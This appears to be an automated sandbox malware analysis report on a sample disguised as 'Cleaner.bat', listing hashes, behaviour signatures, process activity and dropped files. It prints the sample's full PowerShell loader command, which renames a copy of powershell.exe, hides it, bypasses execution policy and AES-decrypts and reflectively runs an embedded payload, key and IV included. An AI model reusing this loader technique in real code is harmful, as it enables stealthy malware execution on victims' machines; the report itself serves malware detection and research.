Analysis
-
max time kernel
41s -
max time network
44s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
17-05-2022 11:55
Static task
static1
Behavioral task
behavioral1
Sample
Cleaner.bat
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
Cleaner.bat
Resource
win10v2004-20220414-en
General
-
Target
Cleaner.bat
-
Size
3.1MB
-
MD5
b0f63b3801d950a3ce8f27d08d4b413a
-
SHA1
5445683bc8c1bdc716ae84cd59dea91ae814dd19
-
SHA256
0162d08202e23240665087b0dfe32652406b6c0595096bb6666234e829cd6233
-
SHA512
051f9fcba315db5f9cc0dec07c1736f984ef94151b92e7ecc3c6823529f4e55270ff44bd08416a77a9f0eb8c732b679ff0500932d309ab51e645b4db909cfc43
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
Cleaner.bat.exepid process 628 Cleaner.bat.exe -
Loads dropped DLL 1 IoCs
Processes:
cmd.exepid process 1468 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Cleaner.bat.exepid process 628 Cleaner.bat.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Cleaner.bat.exedescription pid process Token: SeDebugPrivilege 628 Cleaner.bat.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
cmd.exeCleaner.bat.exedescription pid process target process PID 1468 wrote to memory of 820 1468 cmd.exe cmd.exe PID 1468 wrote to memory of 820 1468 cmd.exe cmd.exe PID 1468 wrote to memory of 820 1468 cmd.exe cmd.exe PID 1468 wrote to memory of 1992 1468 cmd.exe xcopy.exe PID 1468 wrote to memory of 1992 1468 cmd.exe xcopy.exe PID 1468 wrote to memory of 1992 1468 cmd.exe xcopy.exe PID 1468 wrote to memory of 968 1468 cmd.exe attrib.exe PID 1468 wrote to memory of 968 1468 cmd.exe attrib.exe PID 1468 wrote to memory of 968 1468 cmd.exe attrib.exe PID 1468 wrote to memory of 628 1468 cmd.exe Cleaner.bat.exe PID 1468 wrote to memory of 628 1468 cmd.exe Cleaner.bat.exe PID 1468 wrote to memory of 628 1468 cmd.exe Cleaner.bat.exe PID 628 wrote to memory of 1372 628 Cleaner.bat.exe csc.exe PID 628 wrote to memory of 1372 628 Cleaner.bat.exe csc.exe PID 628 wrote to memory of 1372 628 Cleaner.bat.exe csc.exe PID 1468 wrote to memory of 1032 1468 cmd.exe attrib.exe PID 1468 wrote to memory of 1032 1468 cmd.exe attrib.exe PID 1468 wrote to memory of 1032 1468 cmd.exe attrib.exe -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 968 attrib.exe 1032 attrib.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Cleaner.bat"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F"2⤵
-
C:\Windows\system32\xcopy.exexcopy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe" /y2⤵
-
C:\Windows\system32\attrib.exeattrib +s +h "C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe"2⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exeCleaner.bat.exe -noprofile -windowstyle hidden -executionpolicy bypass -command $cpGMmW = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\Cleaner.bat').Split([Environment]::NewLine);$vKMTac = $cpGMmW[$cpGMmW.Length - 1];$qUeblb = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dXNpbmcgU3lzdGVtLlRleHQ7dXNpbmcgU3lzdGVtLklPO3VzaW5nIFN5c3RlbS5JTy5Db21wcmVzc2lvbjt1c2luZyBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5OyBwdWJsaWMgY2xhc3MgZHlIZHhWIHsgcHVibGljIHN0YXRpYyBieXRlW10gSHVTTFdiKGJ5dGVbXSBpbnB1dCwgYnl0ZVtdIGtleSwgYnl0ZVtdIGl2KSB7IEFlc01hbmFnZWQgYWVzID0gbmV3IEFlc01hbmFnZWQoKTsgYWVzLk1vZGUgPSBDaXBoZXJNb2RlLkNCQzsgYWVzLlBhZGRpbmcgPSBQYWRkaW5nTW9kZS5QS0NTNzsgSUNyeXB0b1RyYW5zZm9ybSBkZWNyeXB0b3IgPSBhZXMuQ3JlYXRlRGVjcnlwdG9yKGtleSwgaXYpOyBieXRlW10gZGVjcnlwdGVkID0gZGVjcnlwdG9yLlRyYW5zZm9ybUZpbmFsQmxvY2soaW5wdXQsIDAsIGlucHV0Lkxlbmd0aCk7IGRlY3J5cHRvci5EaXNwb3NlKCk7IGFlcy5EaXNwb3NlKCk7IHJldHVybiBkZWNyeXB0ZWQ7IH0gcHVibGljIHN0YXRpYyBieXRlW10gRndaYVdtKGJ5dGVbXSBieXRlcykgeyBNZW1vcnlTdHJlYW0gbXNpID0gbmV3IE1lbW9yeVN0cmVhbShieXRlcyk7IE1lbW9yeVN0cmVhbSBtc28gPSBuZXcgTWVtb3J5U3RyZWFtKCk7IHZhciBncyA9IG5ldyBHWmlwU3RyZWFtKG1zaSwgQ29tcHJlc3Npb25Nb2RlLkRlY29tcHJlc3MpOyBncy5Db3B5VG8obXNvKTsgZ3MuRGlzcG9zZSgpOyBtc2kuRGlzcG9zZSgpOyBtc28uRGlzcG9zZSgpOyByZXR1cm4gbXNvLlRvQXJyYXkoKTsgfSB9'));Add-Type -TypeDefinition $qUeblb;[System.Reflection.Assembly]::Load([dyHdxV]::FwZaWm([dyHdxV]::HuSLWb([System.Convert]::FromBase64String($vKMTac), [System.Convert]::FromBase64String('GpALIgw8Bm2Ku/F1LxriAEFFGLwksa0vKKHsogEGbsM='), [System.Convert]::FromBase64String('0GcmDM5eLt1yF271xja3FQ==')))).EntryPoint.Invoke($null, (, [string[]] ('')))2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vq_cgk1s.cmdline"3⤵
-
C:\Windows\system32\attrib.exeattrib -s -h "C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe"2⤵
- Views/modifies file attributes
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exeFilesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exeFilesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
\??\c:\Users\Admin\AppData\Local\Temp\vq_cgk1s.0.csFilesize
744B
MD57ba109a6ade3811040a994c47678a924
SHA1852d06b7e9d96fcd7ed0de7dca03882044d6684a
SHA25682b5ccd87e34e64a00145fe3a7baaeb2fec10213583a32cf7a0327516fe960e3
SHA512f81a5f1899594ab262ee4f57b3f4af58ed991d7db9bc48ec1397f9caa966f53e660e4e35fc0bfadc55ca13850b3727a2fab68ef42d445cd96ee290cfc11f4971
-
\??\c:\Users\Admin\AppData\Local\Temp\vq_cgk1s.cmdlineFilesize
309B
MD5f0df972c32b5c646e8daf7eab4f05f8a
SHA13181a85879c58713fc79f6147963716dc1606934
SHA2564239fb5041edd1d60b8ce4e57875adb7ed3a3674c6b669de9616e5e8141b1be4
SHA512a4ccd209b72e9d19acf349d41ca825014c9b749cb68b0844862714ab03dbcea39f34e643b77e9048cdf9bd2a5f5c94aaa63d3f4d7138c082af1650e14f3757ee
-
\Users\Admin\AppData\Local\Temp\Cleaner.bat.exeFilesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
memory/628-59-0x0000000000000000-mapping.dmp
-
memory/628-61-0x000007FEFB551000-0x000007FEFB553000-memory.dmpFilesize
8KB
-
memory/628-62-0x000007FEF26A0000-0x000007FEF31FD000-memory.dmpFilesize
11.4MB
-
memory/628-67-0x000000000252B000-0x000000000254A000-memory.dmpFilesize
124KB
-
memory/628-66-0x0000000002524000-0x0000000002527000-memory.dmpFilesize
12KB
-
memory/820-54-0x0000000000000000-mapping.dmp
-
memory/968-56-0x0000000000000000-mapping.dmp
-
memory/1032-68-0x0000000000000000-mapping.dmp
-
memory/1372-63-0x0000000000000000-mapping.dmp
-
memory/1992-55-0x0000000000000000-mapping.dmp